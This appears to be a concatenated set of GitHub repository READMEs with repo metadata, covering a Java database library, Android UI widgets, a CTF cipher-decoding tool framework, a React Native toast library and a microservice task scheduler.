# sql2o [![Github Actions Build](https://github.com/aaberg/sql2o/actions/workflows/pipeline.yml/badge.svg)](https://github.com/aaberg/sql2o/actions) [![Maven Central](https://img.shields.io/maven-central/v/org.sql2o/sql2o.svg)](https://search.maven.org/search?q=g:org.sql2o%20a:sql2o) Sql2o is a small java library, with the purpose of making database interaction easy. When fetching data from the database, the ResultSet will automatically be filled into your POJO objects. Kind of like an ORM, but without the SQL generation capabilities. Sql2o requires at Java 7 or 8 to run. Java versions past 8 may work, but is currently not supported. # Announcements *2024-03-12* | [Sql2o 1.7.0 was released](https://github.com/aaberg/sql2o/discussions/365) # Examples Check out the [sql2o website](http://www.sql2o.org) for examples. # Coding guidelines. When hacking sql2o, please follow [these coding guidelines](https://github.com/aaberg/sql2o/wiki/Coding-guidelines).
0
hackware1993/MagicIndicator
A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip —— 强大、可定制、易扩展的 ViewPager 指示器框架。是ViewPagerIndicator、TabLayout、PagerSlidingTabStrip的最佳替代品。支持角标,更支持在非ViewPager场景下使用(使用hide()、show()切换Fragment或使用setVisibility切换FrameLayout里的View等),http://www.jianshu.com/p/f3022211821c
indicator pagerslidingtabstrip tablayout viewpager viewpagerindicator
# MagicIndicator A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip. [Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine. **I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort) [![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252) [![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator) ![magicindicaotor.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif) # Usage Simple steps, you can integrate **MagicIndicator**: 1. checkout out **MagicIndicator**, which contains source code and demo 2. import module **magicindicator** and add dependency: ```groovy implementation project(':magicindicator') ``` **or** ```groovy repositories { ... maven { url "https://jitpack.io" } } dependencies { ... implementation 'com.github.hackware1993:MagicIndicator:1.6.0' // for support lib implementation 'com.github.hackware1993:MagicIndicator:1.7.0' // for androidx } ``` 3. add **MagicIndicator** to your layout xml: ```xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:orientation="vertical" tools:context="net.lucode.hackware.magicindicatordemo.MainActivity"> <net.lucode.hackware.magicindicator.MagicIndicator android:id="@+id/magic_indicator" android:layout_width="match_parent" android:layout_height="40dp" /> <android.support.v4.view.ViewPager android:id="@+id/view_pager" android:layout_width="match_parent" android:layout_height="0dp" android:layout_weight="1" /> </LinearLayout> ``` 4. find **MagicIndicator** through code, initialize it: ```java MagicIndicator magicIndicator = (MagicIndicator) findViewById(R.id.magic_indicator); CommonNavigator commonNavigator = new CommonNavigator(this); commonNavigator.setAdapter(new CommonNavigatorAdapter() { @Override public int getCount() { return mTitleDataList == null ? 0 : mTitleDataList.size(); } @Override public IPagerTitleView getTitleView(Context context, final int index) { ColorTransitionPagerTitleView colorTransitionPagerTitleView = new ColorTransitionPagerTitleView(context); colorTransitionPagerTitleView.setNormalColor(Color.GRAY); colorTransitionPagerTitleView.setSelectedColor(Color.BLACK); colorTransitionPagerTitleView.setText(mTitleDataList.get(index)); colorTransitionPagerTitleView.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View view) { mViewPager.setCurrentItem(index); } }); return colorTransitionPagerTitleView; } @Override public IPagerIndicator getIndicator(Context context) { LinePagerIndicator indicator = new LinePagerIndicator(context); indicator.setMode(LinePagerIndicator.MODE_WRAP_CONTENT); return indicator; } }); magicIndicator.setNavigator(commonNavigator); ``` 5. work with ViewPager: ```java ViewPagerHelper.bind(magicIndicator, mViewPager); ``` **or** work with Fragment Container(switch Fragment by hide()、show()): ```java mFramentContainerHelper = new FragmentContainerHelper(magicIndicator); // ... mFragmentContainerHelper.handlePageSelected(pageIndex); // invoke when switch Fragment ``` # Extend **MagicIndicator** can be easily extended: 1. implement **IPagerTitleView** to customize tab: ```java public class MyPagerTitleView extends View implements IPagerTitleView { public MyPagerTitleView(Context context) { super(context); } @Override public void onLeave(int index, int totalCount, float leavePercent, boolean leftToRight) { } @Override public void onEnter(int index, int totalCount, float enterPercent, boolean leftToRight) { } @Override public void onSelected(int index, int totalCount) { } @Override public void onDeselected(int index, int totalCount) { } } ``` 2. implement **IPagerIndicator** to customize indicator: ```java public class MyPagerIndicator extends View implements IPagerIndicator { public MyPagerIndicator(Context context) { super(context); } @Override public void onPageSelected(int position) { } @Override public void onPageScrolled(int position, float positionOffset, int positionOffsetPixels) { } @Override public void onPageScrollStateChanged(int state) { } @Override public void onPositionDataProvide(List<PositionData> dataList) { } } ``` 3. use **CommonPagerTitleView** to load custom layout xml. Now, enjoy yourself! See extensions in [*app/src/main/java/net/lucode/hackware/magicindicatordemo/ext*](https://github.com/hackware1993/MagicIndicator/tree/master/app/src/main/java/net/lucode/hackware/magicindicatordemo/ext),more extensions adding... # Who developed? hackware1993@gmail.com cfb1993@163.com Q&A <a target="_blank" href="http://shang.qq.com/wpa/qunwpa?idkey=7ac5bef0321c7afa7e9fc4e94175fa36f413e3330c82e828b1743274af8a64d7"><img border="0" src="http://pub.idqqimg.com/wpa/images/group.png" alt="MagicIndicator交流群" title="MagicIndicator交流群"></a> An intermittent perfectionist. Visit [My Blog](http://hackware.lucode.net) for more articles about MagicIndicator. 订阅我的微信公众号以及时获取 MagicIndicator 的最新动态。后续也会分享一些高质量的、独特的、有思想的 Flutter 和 Android 技术文章。 ![official_account.webp](https://github.com/hackware1993/weiV/blob/master/official_account.webp?raw=true) # License ``` MIT License Copyright (c) 2016 hackware1993 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ``` # More Have seen here, give a star?(都看到这儿了,何不给个...,哎,别走啊,star还没...)
0
0Chencc/CTFCrackTools
China's first CTFTools framework.中国国内首个CTF工具框架,旨在帮助CTFer快速攻克难关
ctf ctf-tools framework java jython kotlin-java python websecurity
# CTFcrackTools-V4.0 [![Build Status](https://travis-ci.org/0Chencc/CTFCrackTools.svg?branch=master)](https://travis-ci.org/0Chencc/CTFCrackTools) [![](https://img.shields.io/github/v/release/0chencc/ctfcracktools?label=LATEST%20VERSION)](https://github.com/0Chencc/CTFCrackTools/releases/latest) [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://raw.githubusercontent.com/0Chencc/CTFCrackTools/master/doc/LICENSE) [![download](https://img.shields.io/github/downloads/0chencc/ctfcracktools/total)](https://github.com/0Chencc/CTFCrackTools/releases) [![language](https://img.shields.io/badge/Language-Java/Kotlin-orange.svg)](https://github.com/0Chencc/CTFCrackTools/) 作者:林晨(0chen) 米斯特安全官网:http://www.acmesec.cn/ 本工具已经可以作为burp插件导入,仓库地址:[DaE](https://github.com/0Chencc/DaE) [请我喝一杯咖啡☕️](#要饭环节) ## 疑难解答 跳转到:[https://github.com/0Chencc/CTFCrackTools/wiki/FAQ](https://github.com/0Chencc/CTFCrackTools/wiki/FAQ) ## 界面介绍 主页面 ![mark](img/use.gif) 添加插件 ![mark](img/plugin.gif) ## 框架介绍 使用kotlin与java混合开发 这大概是国内首个应用于CTF的工具框架。 可以被应用于CTF中的Crypto,Misc... 内置目前主流密码(包括但不限于维吉利亚密码,凯撒密码,栅栏密码······) 用户可自主编写插件,但仅支持Python编写插件。编写方法也极为简单。(由于Jython自身的原因,暂时无法支持Python3) 在导入插件的时候一定要记得确认jython文件已经加载。 我们附带了一些插件在[现成插件](https://github.com/0Chencc/CTFCrackTools/tree/master/%E7%8E%B0%E6%88%90%E6%8F%92%E4%BB%B6)可供用户的使用 该项目一直在增强,这一次的重置只保留了部分核心代码,而将UI及优化代码重构,使这个框架支持更多功能。 项目地址:[https://github.com/0Chencc/CTFCrackTools](https://github.com/0Chencc/CTFCrackTools) 下载编译好的版本:[releases](https://github.com/0Chencc/CTFCrackTools/releases/) ## 插件编写 ![plugin](img/plugin.gif) ```Python #-*- coding:utf-8 -*- #一个函数调用的demo def main(input,a): return 'input is %s,key is %s'%(input,a) #我们希望能将插件开发者的信息存入程序中,所以需要定义author_info来进行开发者信息的注册 def author_info(): info = { "author":"0chen", "name":"test_version", "key":["a"], "describe":"plugin describe" } return info ``` 现在来具体讲下这些插件的用法,具体应该将下框架的调用方法。 **函数:** main **描述:** 这个是程序调用插件时调用的函数。 定义: ```python def main(input): return 'succ' ``` **函数:** author_info **描述:** 我们希望能将插件开发者的信息存入程序中,所以需要定义author_info来进行开发者信息的注册 **author:** 作者信息 **name:** 插件名称 **key:** 考虑到会有某些特定的密码需要key,有时候需要多个key。所以可以注册key的信息,当程序调用的时候会进行弹框。 **describe:** 这个地方是插件的描述。由于python2的原因,似乎对中文的支持不是很全,建议大家使用英文来进行描述。 定义: ```python def author_info(): info = { "author":"0chen", "name":"test_version", "key":["a"], "describe":"plugin describe" } return info ``` **因为工具调用其实就是通过def mian(input)传入数据然后获取return的数据。** ```Python #!/usr/bin/env python # -*- coding: utf-8 -*- def vigenereDecrypto(ciphertext,key): ascii='ABCDEFGHIJKLMNOPQRSTUVWXYZ' keylen=len(key) ctlen=len(ciphertext) plaintext = '' i = 0 while i < ctlen: j = i % keylen k = ascii.index(key[j]) m = ascii.index(ciphertext[i]) if m < k: m += 26 plaintext += ascii[m-k] i += 1 return plaintext def author_info: info = { 'name':'VigenereDecrypto', 'author':'naiquan', 'key':'key', 'describe':'VigenereDecrypto' } def main(input,key): return vigenereDecrypto(input.replace(" ","").upper(),key.replace(" ","").upper()) ``` 多参数调用demo(注册传入函数只需要以string数组的形式注册即可,如demo所示) ```python #-*- coding:utf-8 -*- #多参数调用的demo #abd分别为需要传入参数,基本上没有参数限制(没测过) def main(input,a,b,c): return 'input is %s,key a is %s,key b is %s,key c is %s'%(input,a,b,c) #我们希望能将插件开发者的信息存入程序中,所以需要定义author_info来进行开发者信息的注册 def author_info(): info = { "author":"0chen", "name":"test_version", "key":["a","b","c"], "describe":"plugin describe" } return info ``` ## 作者的碎碎念 ​ 作为一款自从2016年发布至今的工具,由于发布的时候,彼时作者在读高中,没有时间也没有能力去更新这样一款受众颇多的工具,这款工具到至今我收到了许多ctf初学者的感谢,因为近两年一直忙于生计,很难有时间去顾及到这款工具的发展,但是仍然会有许多朋友来联系我的qq和微信,对这款工具的发展提出宝贵的意见,这也是我时不时更新的动力。 ​ 我发现国内很多厂商都将这款工具作为ctf必备的工具加入到工具包中,非常感谢这些朋友的抬爱,也因为他们我的工具才能有上万人在使用。ctf圈子的氛围日益增长,希望这款工具也能跟随大家一直使用下去。 ​ 我在高二的时候参加了人生第一次ctf比赛,那时候被虐得体无完肤。当时我们留意到第一名在提交wp的时候也有这款工具的截图,让我非常开心。我希望这款工具能伴随各位ctfer的成长,如果有什么做得不够好的地方,欢迎大家在github的issue提供宝贵的意见,在力所能及的范围内我一定会采纳。 ​ 会一直坚持开源,也欢迎各位厂商继续采用我的工具作为新手必备的工具,感谢大家! ​ 另外:米斯特安全团队一直在寻找优秀的CTF选手,如果有打算来我们团队发展的朋友可以联系邮箱:admin@hi-ourlife.com ## 旧版本 旧版本与新版本的差别仅仅在于ui的差别,最新的4.0版本抛弃了3.0被大家诟病的ui,并且在2.0也就是调查发现比较喜欢的版本的基础上进行了ui的美化,我认为旧版本已没有存在的必要,所以将项目设置为private,如果呼声过高我会重新开放。感谢大家。 ~~[https://github.com/Acmesec/CTFCrackTools-V2](https://github.com/Acmesec/CTFCrackTools-V2)~~ ## 要饭环节 我司承接各类安全培训以及渗透测试,可联系admin[#]hi-ourlife.com ![wechat](img/wechat.jpeg)
0
nandorojo/burnt
Crunchy toasts for React Native. 🍞
null
# 🍞 burnt Cross-platform toasts for React Native, powered by native elements. - [Install](#installation) - [Usage](#api) Now with Android, iOS & Web Support. ## Alerts https://user-images.githubusercontent.com/13172299/202289223-8a333223-3afa-49c4-a001-a70c76150ef0.mp4 ## ...and Toasts https://user-images.githubusercontent.com/13172299/231801324-3f0858a6-bd61-4d74-920f-4e77b80d26c1.mp4 ## ...and Web Support https://user-images.githubusercontent.com/13172299/236826405-b5f423bb-dafd-4013-a941-7accbea43c14.mp4 ## Context See this [Twitter thread](https://twitter.com/FernandoTheRojo/status/1592923529644625920). ## What This is a library with a `toast` and `alert` method for showing ephemeral UI. On iOS, it wraps [`SPIndicator`](https://github.com/ivanvorobei/SPIndicator) and [`AlertKit`](https://github.com/sparrowcode/AlertKit). On Android, it wraps `ToastAndroid` from `react-native`. `Burnt.alert()` falls back to `Burnt.toast()` on Android. This may change in a future version. On Web, it wraps [`sonner`](https://github.com/emilkowalski/sonner) by Emil Kowalski. Burnt works with both the old & new architectures. It's built on top of JSI, thanks to Expo's new module system. ## Features - Simple, imperative `toast` that uses **native** components under the hood, rather than using React state with JS-based UI. - Animated icons - iOS App Store-like `alert` popups - Overlays on top of native iOS modals - Loading alerts ## Modals Displaying toasts on top of modals has always been an issue in React Native. With Burnt, this works out of the box. https://user-images.githubusercontent.com/13172299/231801096-2894fbf3-4df7-45d7-9c72-f80d36fd45ef.mp4 ## Usage ```tsx import * as Burnt from "burnt"; Burnt.toast({ title: "Burnt installed.", preset: "done", message: "See your downloads.", }); ``` You can also `Burnt.alert()` and `Burnt.dismissAllAlerts()`. ## TODO - [x] iOS support - [x] Android support - [x] Custom iOS icons - [x] Web support ## Installation ```sh yarn add burnt ``` ### Expo Burnt likely requires Expo SDK 46+. ```sh npx expo install burnt expo-build-properties ``` Add the `expo-build-properties` plugin to your `app.json`/`app.config.js`, setting the deployment target to `13.0` (or higher): ```js export default { plugins: [ [ "expo-build-properties", { ios: { deploymentTarget: "13.0", }, }, ], ], }; ``` Then, you'll need to rebuild your dev client. Burnt will not work in Expo Go. ```sh npx expo prebuild --clean npx expo run:ios ``` The config plugin ensures that your iOS app has at least iOS 13 as a deployment target, which is required for Burnt (as well as Expo SDK 47+). ### Web Support To enable Web support, you need to add the `<Toaster />` to the root of your app. If you're using Next.js, add this into your `_app.tsx` component. ```tsx // _app.tsx import { Toaster } from "burnt/web"; function MyApp({ Component, pageProps }) { return ( <> <Component {...pageProps} /> <Toaster position='bottom-right' /> </> ); } ``` If you're using Next.js, add `burnt` to your `transpilePackages` in `next.config.js`. ```tsx /** @type {import('next').NextConfig} */ const nextConfig = { transpilePackages: [ // Your other packages here "burnt" ] } ``` To configure your `Toaster`, please reference the `sonner` [docs](https://github.com/emilkowalski/sonner/tree/main#theme). ### Expo Web If you're using Expo Web, you'll need to add the following to your `metro.config.js` file: ```js // Learn more https://docs.expo.io/guides/customizing-metro const { getDefaultConfig } = require("expo/metro-config"); const config = getDefaultConfig(__dirname); // --- burnt --- config.resolver.sourceExts.push("mjs"); config.resolver.sourceExts.push("cjs"); // --- end burnt --- module.exports = config; ``` ### Plain React Native ```sh pod install ``` ### Solito ```sh cd applications/app expo install burnt expo-build-properties npx expo prebuild --clean npx expo run:ios cd ../.. yarn ``` Be sure to also follow the [expo](#expo) instructions and [web](#web-support) instructions. ## API ### `toast` https://user-images.githubusercontent.com/13172299/202275423-300671e5-3918-4d5d-acae-0602160de252.mp4 `toast(options): Promise<void>` ```tsx Burnt.toast({ title: "Congrats!", // required preset: "done", // or "error", "none", "custom" message: "", // optional haptic: "none", // or "success", "warning", "error" duration: 2, // duration in seconds shouldDismissByDrag: true, from: "bottom", // "top" or "bottom" // optionally customize layout layout: { iconSize: { height: 24, width: 24, }, }, icon: { ios: { // SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/. name: "checkmark.seal", color: "#1D9BF0", }, web: <Icon />, }, }); ``` ### `alert` https://user-images.githubusercontent.com/13172299/202275324-4f6cb5f5-a103-49b5-993f-2030fc836edb.mp4 _The API changed since recording this video. It now uses object syntax._ `alert(options): Promise<void>` ```tsx import * as Burnt from "burnt"; export const alert = () => { Burnt.alert({ title: "Congrats!", // required preset: "done", // or "error", "heart", "custom" message: "", // optional duration: 2, // duration in seconds // optionally customize layout layout: { iconSize: { height: 24, width: 24, }, }, icon: { ios: { // SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/. name: "checkmark.seal", color: "#1D9BF0", }, web: <Icon />, }, }); }; ``` On Web, this will display a regular toast. This may change in the future. ### `dismissAllAlerts()` Does what you think it does! In the future, I'll allow async spinners for promises, and it'll be useful then. ## Contribute ```sh yarn build cd example yarn npx expo run:ios # do this again whenever you change native code ``` You can edit the iOS files in `ios/`, and then update the JS accordingly in `src`. ## Thanks Special thanks to [Tomasz Sapeta](https://twitter.com/tsapeta) for offering help along the way. Expo Modules made this so easy to build, and all with Swift – no Objective C. It's my first time writing Swift, and it was truly a breeze.
0
siaorg/sia-task
微服务任务调度框架
null
## 关于我们 * 邮件交流:sia.list@creditease.cn * 提交issue: * 微信交流: <img src="docs/images/newlog.jpeg" width="30%" height="30%"> 微服务任务调度平台 === [使用指南](USERSGUIDE.md) </br> [开发指南](DEVELOPGUIDE.md) </br> [部署指南](DEPLOY.md)</br> [Demo](FASTSTART.md)</br> 背景 --- 无论是互联网应用或者企业级应用,都充斥着大量的批处理任务。我们常常需要一些任务调度系统帮助我们解决问题。随着微服务化架构的逐步演进,单体架构逐渐演变为分布式、微服务架构。在此的背景下,很多原先的任务调度平台已经不能满足业务系统的需求。于是出现了一些基于分布式的任务调度平台。这些平台各有其特点,但各有不足之处,比如不支持任务编排、与业务高耦合、不支持跨平台等问题。不是非常符合公司的需求,因此我们开发了微服务任务调度平台(SIA-TASK)。 SIA是我们公司基础开发平台Simple is Awesome的简称,SIA-TASK(微服务任务调度平台)是其中的一项重要产品,SIA-TASK契合当前微服务架构模式,具有跨平台,可编排,高可用,无侵入,一致性,异步并行,动态扩展,实时监控等特点。 Introduction --- A lot of batch tasks need to be processed by task scheduling systems. The single architectures are evolving towards distributed ones. We often need distributed task scheduling platforms to handle the needs of business systems. But such platforms may not support task scheduling across OS or are coupled with business features. We therefore decided to develop SIA-TASK. SIA (Simple is Awesome) is our basic development platform. SIA-TASK is one of the key products of SIA and can work across OS. Its features include task scheduling, high availability, non-invasiveness, consistency, asynchronous concurrent processing, dynamic scale-out and real-time monitoring, etc. 项目简介 --- SIA-TASK是任务调度的一体式解决方案。对任务进行元数据采集,然后进行任务可视化编排,最终进行任务调度,并且对任务采取全流程监控,简单易用。对业务完全无侵入,通过简单灵活的配置即可生成符合预期的任务调度模型。 SIA-TASK借鉴微服务的设计思想,获取分布在每个任务执行器上的任务元数据,上传到任务注册中心。利用在线方式进行任务编排,可动态修改任务时钟,采用HTTP作为任务调度协议,统一使用JSON数据格式,由调度中心进行时钟解析,执行任务流程,进行任务通知。 Overview --- SIA-TASK is an integrated non-invasive task scheduling solution. It collects task metadata and then visualizes and schedules the tasks. The scheduled tasks are monitored throughout the whole process. An ideal task scheduling model can be generated after simple and flexible configuration. SIA-TASK collects task metadata on all executers and upload the data to the registry. The tasks are scheduled online using JSON with HTTP as the protocol. The scheduling center parses the clock, executes tasks and sends task notifications. 关键术语 --- * 任务(Task): 基本执行单元,执行器对外暴露的一个HTTP调用接口; * 作业(Job): 由一个或者多个存在相互逻辑关系(串行/并行)的任务组成,任务调度中心调度的最小单位; * 计划(Plan): 由若干个顺序执行的作业组成,每个作业都有自己的执行周期,计划没有执行周期; * 任务调度中心(Scheduler): 根据每个的作业的执行周期进行调度,即按照计划、作业、任务的逻辑进行HTTP请求; * 任务编排中心(Config): 编排中心使用任务来创建计划和作业; * 任务执行器(Executer): 接收HTTP请求进行业务逻辑的执行; * Hunter:Spring项目扩展包,负责执行器中的任务抓取,上传注册中心,业务可依赖该组件进行Task编写。 Terms --- * Task: the basic execution unit and the HTTP call interface * Job: the minimum scheduled unit that is composed of one or more (serial/concurrent) tasks * Plan: the composition of several serial jobs with no execution cycle * Scheduler: sends HTTP requests based on the logic of the plans, jobs and tasks * Config: creates plans and jobs with tasks * Executer: receives HTTP requests and executes the business logic * Hunter: fetches tasks, uploads metadata and scripts business tasks 微服务任务调度平台的特性 --- * 基于注解自动抓取任务,在暴露成HTTP服务的方法上加入@OnlineTask注解,@OnlineTask会自动抓取方法所在的IP地址,端口,请求路径,请求方法,请求参数格式等信息上传到任务注册中心(zookeeper),并同步写入持久化存储中,此方法即任务; * 基于注解无侵入多线程控制,单一任务实例必须保持单线程运行,任务调度框架自动拦截@OnlineTask注解进行单线程运行控制,保持在一个任务运行时不会被再次调度。而且整个控制过程对开发者完全无感知。 * 调度器自适应任务分配,任务执行过程中出现失败,异常时。可以根据任务定制的策略进行多点重新唤醒任务,保证任务的不间断执行。 * 高度灵活任务编排模式,SIA-TASK的设计思想是以任务为原子,把多个任务按照执行的关系组合起来形成一个作业。同时运行时分为任务调度中心和任务编排中心,使得作业的调度和作业的编排分隔开来,互不影响。在我们需要调整作业的流程时,只需要在编排中心进行处理即可。同时编排中心支持任务按照串行,并行,分支等方式组织关系。在相同任务不同任务实例时,也支持多种调度方式进行处理。 Features --- * Annotation-based automatic task fetching. Add @OnlineTask to the HTTP method. @OnlineTask would fetch and upload the IP address, port, request path, and request parameter format to the registry (Zookeeper) while writing the information into the persistent storage. * Annotation-based non-invasive multi-threading control. The scheduler automatically intercepts @OnlineTask for single-threading control and ensures that the running task would not be scheduled again. The whole process is non-invasive. * Self-adaptive task scheduling. Tasks can be woken up based on the custom strategies when execution failure happens. * Flexible task configuration. SIA-TASK is designed to group several logically related tasks into a job. The Scheduler and the Config schedules and configures jobs independently. The Config allows tasks to be organized in series, concurrently or as branches. Instances of the same task can be scheduled differently. 微服务任务调度平台设计 --- SIA-TASK主要分为五个部分: * 任务执行器 * 任务调度中心 * 任务编排中心 * 任务注册中心(zookeeper) * 持久存储(Mysql) SIA-TASK includes the following components: * Executer * Scheduler * Config * Registry (Zookeeper) * Persistent storage (MySQL) ![逻辑架构图](docs/images/sia_task1.png) SIA-TASK的主要运行逻辑: 1. 通过注解抓取任务执行器中的任务上报到任务注册中心 2. 任务编排中心从任务注册中心获取数据进行编排保存入持久化存储 3. 任务调度中心从持久化存储获取调度信息 4. 任务调度中心按照调度逻辑访问任务执行器 SIA-TASK的主要运行逻辑: 1. Fetch and upload annotated tasks to the registry 2. The Config obtains data from the registry for scheduling and persistent storage 3. The Scheduler acquires data from the persistent storage 4. The Scheduler accesses the task scheduler following the scheduling logic ![逻辑架构图](docs/images/sia_task2.png) UI预览 --- 首页提供多维度监控 * 调度器信息:展示调度器信息(负载能力,预警值),以及作业分布情况。 * 调度信息:展示调度中心触发的调度次数,作业、任务多维度调度统计。 * 对接项目统计:对使用项目的系统进行统计,作业个数,任务个数等等。 Homepage * Scheduler: loading capacity, alarm value and job distribution * Scheduling: scheduling frequency, job metrics and task metrics * Active users: job count and task count of active users ![首页](docs/images/index.png) </br> 调度监控提供对已提交的作业进行实时监控展示 * 作业状态实时监控:以项目组为单位面板,展示作业运行时状态。 * 实时日志关联:可以通过涂色状态图标进行日志实时关联展示。 Scheduling Monitor: real-time monitoring over submitted jobs * Real-time job monitoring: runtime metrics of jobs by project group * Real-time log correlation: 可以通过涂色状态图标进行日志实时关联展示。 ![调度监控](docs/images/scheduling-monitoring.png) </br> 任务管理:提供任务元数据的相关操作 * 任务元数据录入:手动模式的任务,可在此进行录入。 * 任务连通性测试:提供任务连通性功能测试。 * 任务元数据其他操作:修改,删除。 Task Manager: task metadata operation * Metadata entry: enter the metadata of manual tasks * Connectivity test: test the connectivity of tasks * Modification and deletion ![Task管理](docs/images/Task-management.png) ![Task管理](docs/images/user-handbook_taskMg5.png) </br> Job管理:提供作业相关操作 * 任务编排:进行作业的编排。 * 发布作业: 作业的创建,修改,以及发布。 * 级联设置:提供存在时间依赖的作业设置。 Job Manager: job operations * Task configuration: configure jobs * Job release: create, modify and release jobs * Cascading setting: set time-dependent jobs ![Job管理](docs/images/Job-management.png) </br> 日志管理 Log Manager ![Job管理](docs/images/user-handbook_log1.png) 开源地址 --- * [https://github.com/siaorg/sia-task](https://github.com/siaorg/sia-task) ## 其他说明 ### 关于编译代码 * 建议使用Jdk1.8以上,JDK 1.8 or later version is recommended. ### 版本说明 * 建议版本1.0.0,SIA-TASK 1.0.0 is recommended. ### 版权说明 * 自身使用 Apache v2.0 协议,SIA-TASK uses Apache 2.0. ### 其他相关资料 ## SIA相关开源产品链接: + [微服务路由网关](https://github.com/siaorg/sia-gateway) + [Rabbitmq队列服务PLUS](https://github.com/siaorg/sia-rabbitmq-plus) (待补充)
0
JeasonWong/Particle
It's a cool animation which can use in splash or somewhere else.
null
## What's Particle ? It's a cool animation which can use in splash or anywhere else. ## Demo ![Markdown](https://raw.githubusercontent.com/jeasonwong/Particle/master/screenshots/particle.gif) ## Article [手摸手教你用Canvas实现简单粒子动画](http://www.wangyuwei.me/2016/08/29/%E6%89%8B%E6%91%B8%E6%89%8B%E6%95%99%E4%BD%A0%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E7%B2%92%E5%AD%90%E5%8A%A8%E7%94%BB/) ## Attributes |name|format|description|中文解释 |:---:|:---:|:---:|:---:| | pv_host_text | string |set left host text|设置左边主文案 | pv_host_text_size | dimension |set host text size|设置主文案的大小 | pv_particle_text | string |set right particle text|设置右边粒子上的文案 | pv_particle_text_size | dimension |set particle text size|设置粒子上文案的大小 | pv_text_color | color |set host text color|设置左边主文案颜色 |pv_background_color|color|set background color|设置背景颜色 | pv_text_anim_time | integer |set particle text duration|设置粒子上文案的运动时间 | pv_spread_anim_time | integer |set particle text spread duration|设置粒子上文案的伸展时间 |pv_host_text_anim_time|integer|set host text displacement duration|设置左边主文案的位移时间 ## Usage #### Define your banner under your xml : ```xml <me.wangyuwei.particleview.ParticleView android:layout_width="match_parent" android:layout_height="match_parent" pv:pv_background_color="#2E2E2E" pv:pv_host_text="github" pv:pv_host_text_size="14sp" pv:pv_particle_text=".com" pv:pv_particle_text_size="14sp" pv:pv_text_color="#FFF" pv:pv_text_anim_time="3000" pv:pv_spread_anim_time="2000" pv:pv_host_text_anim_time="3000" /> ``` #### Start animation : ```java mParticleView.startAnim(); ``` #### Add animation listener to listen the end callback : ```java mParticleView.setOnParticleAnimListener(new ParticleView.ParticleAnimListener() { @Override public void onAnimationEnd() { Toast.makeText(MainActivity.this, "Animation is End", Toast.LENGTH_SHORT).show(); } }); ``` ## Import Step 1. Add it in your project's build.gradle at the end of repositories: ```gradle repositories { maven { url 'https://dl.bintray.com/wangyuwei/maven' } } ``` Step 2. Add the dependency: ```gradle dependencies { compile 'me.wangyuwei:ParticleView:1.0.4' } ``` ### About Me [Weibo](http://weibo.com/WongYuwei) [Blog](http://www.wangyuwei.me) ### QQ Group 欢迎讨论 **479729938** ##**License** ```license Copyright [2016] [JeasonWong of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ```
0
alibaba/yugong
阿里巴巴去Oracle数据迁移同步工具(全量+增量,目标支持MySQL/DRDS)
null
